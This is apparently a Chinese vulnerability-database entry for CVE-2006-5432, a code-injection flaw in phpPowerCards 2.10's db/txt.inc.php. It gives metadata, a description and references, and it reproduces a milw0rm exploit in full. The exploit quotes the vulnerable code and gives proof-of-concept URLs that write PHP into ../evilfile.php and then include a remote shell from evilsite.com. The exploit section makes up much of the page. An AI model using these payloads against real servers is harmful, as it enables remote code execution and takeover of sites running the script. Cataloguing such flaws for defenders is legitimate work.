PhpPowerCards 'txt.inc.php'直接静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111325 漏洞类型 输入验证
发布时间 2006-10-18 更新时间 2006-10-23
CVE编号 CVE-2006-5432 CNNVD-ID CNNVD-200610-354
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/2590
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-354
|漏洞详情
phpPowerCards2.10的db/txt.inc.php中存在多个直接静态代码注入漏洞,在启用register_globals的情况下,远程攻击者可以通过(1)email[to],(2)email[from],(3)name[to],(4)name[from],(5)picture,(6)comment或(7)sessionID参数来创建或重写任意文件,例如通过创建一个新的允许远程文件注入的.php文件,然后请求该文件即可触发此漏洞。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpPowerCards 2.10
+ Vendor ............: http://www.giombetti.com/
+ Download ..........: http://lu.download.giombetti.com/phpPowerCards/phppowercards2.10.zip
+ Description .......: "phpPowerCards is a powerfull PHP based postcard script."
+ Class .............: Remote Code Execution
+ Risk ..............: High (Remote Code Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpPowerCards db/txt.inc.php does not initialize the $file variable before using it in the
+ fopen() function on line 10, after $file is opened it then writes several variables which
+ are also uninitialized to $file using the fputs() function. Assuming register_globals = on,
+ we can initialize these variables in a query string and then write anything to a file we
+ desire on the target box that's running phpPowerCards.
+ 
+ Vulnerable Code:
+ db/txt.inc.php, line(s) 10: $fp = fopen("$file","a");
+ db/txt.inc.php, line(s) 23: fputs($fp, $email[to]. "¦¦" .$email[from]. "¦¦" .$name[to]. "¦¦" .$name[from]. "¦¦" .$picture. "¦¦" .$comment. "¦¦" .$sessionID. "\n");
+ 
+ Proof of Concept:
+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&email[to]=[evil code]
+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&comment=[evil code]
+ ... same thing repeated for each variable in the second argument of fputs() on line 23
+ 
+ -> http://[target]/[path]/db/txt.inc.php?file=../evilfile.php&check=0&email[to]=+%3C%3Fphp+include%28%24evil_include%29%3B+%3F%3E+
+ -> http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-18]
|参考资料

来源:BID
名称:20620
链接:http://www.securityfocus.com/bid/20620
来源:OSVDB
名称:29840
链接:http://www.osvdb.org/29840
来源:SECUNIA
名称:22471
链接:http://secunia.com/advisories/22471
来源:MILW0RM
名称:2590
链接:http://milw0rm.com/exploits/2590
来源:XF
名称:phppowercards-txt-code-execution(29669)
链接:http://xforce.iss.net/xforce/xfdb/29669
来源:VUPEN
名称:ADV-2006-4105
链接:http://www.frsirt.com/english/advisories/2006/4105